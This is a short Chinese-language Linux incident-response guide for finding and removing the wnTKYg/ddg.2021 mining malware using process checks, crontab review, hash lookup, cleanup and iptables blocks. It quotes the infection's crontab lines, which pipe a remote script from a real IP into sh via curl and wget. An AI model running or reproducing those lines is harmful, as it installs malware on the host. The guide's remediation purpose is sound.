一 異常進程排查
1、# 進程動態快速定位,使用 top -c可快速定位異常經常的物理位置,查詢異常進程。
2、# top -c
3、# ps -ef 排查
4、# ps -ef |grep wnTKYg
5、# ps -ef |grep ddg.2021
6、# 疑似進程定位
7、[root@localhost ~]# find / -name wnTKYg*
/tmp/wnTKYg
二 計劃任務查詢
1、[root@localhost ~]# crontab -l
/5 * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
/5 * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh
三 異常病毒校驗
1、# md5sum wnTKYg
d3b1700a413924743caab1460129396b wnTKYg
2、進行疑似病毒MD5哈希值的校驗比對
直接將疑似文件wnTKYg的md5哈希值複製到病毒校驗網站https://www.virustotal.com/#search進行查詢比對。通過比對結果,我們可以確認疑似文件是否是惡意程序。
四 處理惡意程序
1、清除計劃任務
# crontab -r # 直接使用此命令即可上次當前用戶的計劃任務
或者 [root@VM_11_13_centos ~]# cd /var/spool/cron/
[root@VM_11_13_centos cron]# vim root 然後刪除計劃任務。
# crontab -l # 直接查詢當前用戶是否還存在計劃任務
2、#pkill wnTKYg
# pkill dgg.2021
3、清除惡意進程
# rm -rf /tmp/ddg.2021
# rm -rf /tmp/wnTKYg
# rm -rf /tmp/i.sh
五 下發訪問控制策略,禁止服務互聯三個惡意程序外聯的外網地址
1、查詢惡意進程外網互聯地址
# netstat -pantul |grep ESTAB
tcp 0 0 192.168.31.9:22 192.168.31.75:3898 ESTABLISHED 3742/sshd
tcp 0 0 192.168.31.9:56842 163.172.226.120:443 ESTABLISHED 7263/wnTKYg
tcp 0 0 192.168.31.9:22 192.168.31.75:3953 ESTABLISHED 3795/sshd
tcp 0 0 192.168.31.9:35286 104.131.231.181:8443 ESTABLISHED 7193/ddg.2021
tcp 0 0 192.168.31.9:55200 218.248.40.228:8443 ESTABLISHED 6339/curl
2、下發放控制策略,禁止服務的外網互聯
# iptables -A OUTPUT -d 163.172.226.120 -j DROP
# iptables -A OUTPUT -d 104.131.231.181 -j DROP
# iptables -A OUTPUT -d 218.248.40.228 -j DROP